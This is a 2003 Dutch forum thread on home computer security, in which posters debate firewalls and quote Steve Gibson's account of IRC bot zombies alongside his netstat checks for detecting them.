en deze; The Strange Tale of the Denial of Service Attacks Against GRC.COM (dit is bijna een cyber-roman, nog leuk om te lezen ook)

Het is bijna onmogelijk om iemand die echt naar binnen wil tegen te houden.
Ik zit achter een gewone router met een firewall... na deze verhalen gelezen te hebben dacht ik; laat ik ook maar weer eens een softwarematige firewall installeren, gewoon om te testen hoe open mijn systeem op dit moment is. Mijn keuze viel op die van Sygate, na enkele tests bleek dat zonder die extra firewall er zeker nog wel gaten in de verdediging zaten en zelfs met die extra firewall ook nog... op een van m'n computers bleek bovendien ook spyware te zitten, iets dat ongemerkt naarbinnen geslopen was ondanks het feit dat ik redelijk oplettend ben met wat ik doe...

verhalen zo als deze lijken mooi, maar dat gaat niet altijd op
IceStorm schreef op 11 januari 2003 @ 01:55:
Een firewall is gewoon niet nodig imho. Ik heb er 2 jaar een gehad (meerdere zelfs) en het enige wat je te zien krijgt is wie er nu weer eens op poort xxx heeft lopen kloppen.
Een standaard XP install met updates is veilig genoeg als particulier (of iig, vind ik).

Een virusscanner is VEEL belangrijker.
jep schreef op 11 januari 2003 @ 02:16:
Inderdaad, firewalls zijn voor zusjes :+.
wat ik eigenlijk wil zeggen is dat je niet paranoide hoeft te worden, maar dat het nooit kwaat kan om af en toe na te lopen wat er met je computer gebeurt.

  • Fear-factoR
  • Registratie: Augustus 2001
  • Laatst online: 06-04-2022

Fear-factoR

catmonkey

[Airwolf] schreef op 12 January 2003 @ 15:36:
1. Wie wil jou hacken en waarvoor ?

Inderdaad, wie zou jou nou willen hacken ?
Tjah ik denk dat je hier zelf al geen antwoord op kan geven.

Waarom ?
Om die CV die erop staat ?
Om die warez die op je pc staan ?
.
het hoeft niet altijd om jou personlijke zooi te gaan. Een hacker kan ook andere redenen hebben jou comp binnen te vallen, simpelweg om jou computer te gebruiken om een andere aan te vallen. Zoiets heet dus Distributed Denial of Service, met de nadruk op Distributed. Dat weten jullie natuurlijk wel, maar hebben jullie er zin in dat jou computer gebruikt wordt om een andere plat te leggen.
The Birth of the IRC Bot  (Windows Attack Zombie)

The computer press calls them "Zombies", but they are known as "Bots" or "IRC Bots" within the hacker community. The particular strain of IRC Bot that attacked us calls itself an "evilbot".
"IRC Bots" are among the newer breed of Distributed Denial of Service (DDoS) agents deployed by the Internet's most active hackers. Whenever an IRC Bot hosting Windows PC is started, the Bot waits for the system to finish booting, then connects to a previously designated IRC server. Using a private password key, it joins a secret IRC channel that is not visible to other users of the IRC server . . . and awaits commands.
The use of a central IRC server provides significant anonymity, deployment, and logistical benefits to the hackers, although as we have seen, it is not without liabilities. I was able to successfully penetrate the Bot's world without much trouble.
IRC servers are often configured to deliberately obscure the names and IP addresses of their clients, thus providing anonymity to all users. Since this anonymity can only be breached through physical access to the server, many Bot armies are "run" from servers located on foreign soil where access is impossible to obtain.
Since IRC Bots "phone home" to the central server, the hacker does not need to know which specific machines are hosting his Bots. This allows Bots to be deployed in the wild by a wide variety of means. Hackers create Bot-carrying eMail viruses (frequently enabled by Microsoft's virus-friendly Outlook Express), they create infected Internet "Trojan" downloads, place Bots in USENET newsgroups, and do anything they can to get their Bots into other people's computers.
IRC Bots never need to be "scanned for" since all active Bots contact their home base IRC server whenever they "awaken". The various IRC Bots I have acquired and examined are just 15,904 bytes in size, so they are easily hidden as trojans within other, typically huge, Windows programs.


A Quick & Easy Check for IRC Zombie/Bots

If you have managed to read all the way through this lengthy and detailed adventure, I am sure you will agree that you do NOT want any of these nasty Zombies or their relatives running around loose inside your PC. Fortunately, it's quite easy to verify that your system is not currently infected by one of these IRC Zombie/Bots.
All of the IRC Zombie/Bots open and maintain static connections to remote IRC chat servers whenever the host PC is connected to the Internet. Although it is possible for an IRC chat server to be configured to run on a port other than "6667", every instance I have seen has used the IRC default port of "6667".
Consequently, an active connection to an IRC server can be detected with the following command:

netstat -an | find ":6667"
Open an MS-DOS Prompt window and type the command line above, then press the "Enter" key. If a line resembling the one shown below is NOT displayed, your computer does not have an open connection to an IRC server running on the standard IRC port. If, however, you see something like this:


TCP 192.168.1.101:1026 70.13.215.89:6667 ESTABLISHED

 . . . then the only question remaining is how quickly you can disconnect your PC from the Internet! A second and equally useful test can also be performed. Since IRC servers generally require the presence of an "Ident" server on the client machine, IRC clients almost always include a local "Ident server" to keep the remote IRC server happy. Every one of the Zombie/Bots I have examined does this. Therefore, the detection of an Ident server running in your machine would be another good cause for alarm. To quickly check for an Ident server, type the following command at an MS-DOS Prompt:

netstat -an | find ":113 "
As before, a blank line indicates that there is no Ident server running on the default Ident port of "113". (Note the "space" after the 113 and before the closing double-quote.) If, however, you see something like this:


TCP 0.0.0.0:113 0.0.0.0:0 LISTENING

 . . . then it's probably time to pull the plug on your cable-modem!
Note that a Windows IRC client program running in the PC will generate false-positive reports since these are tests for IRC client programs. So be sure to completely exit from any known IRC client programs BEFORE performing the tests above.

[ Voor 6% gewijzigd door Fear-factoR op 12-01-2003 16:02 ]


  • NielsHarley
  • Registratie: September 2002
  • Laatst online: 17:26
victorvo schreef op 12 January 2003 @ 05:59:
[...]


Houd in de gaten of er gaten in IIS of XP worden gevonden en welke fixes daarvoor uitgebracht worden. Zoek met Google naar de termen XP, IIS vulnerability (-ties), patch, update. Kijk regelmatig bij Windows update (de corporate versie) en installeer en run de Microsoft Baseline Security Analyzer. Blijf ze steeds een stap voor zogezegd. Je systeem kan dan wel dicht lijken, maar met updates en patches sluit je wel deuren waarvan je voordien niet wist dat je ze had, laat staan dat je wist dat ze wagenwijd open stonden.
Ik heb die Microsoft Baseline Security Analyzer gedownload en nu wil ik hem instaleren maar dan krijg ik de volgende melding van Norton antivirus 2002:

Alert op een malicious script Detected

Object: Windows Script Host Shell Object
Activity: run
File: MsiExec.exe

Action: Stop this script (recommended)
Pagina: 1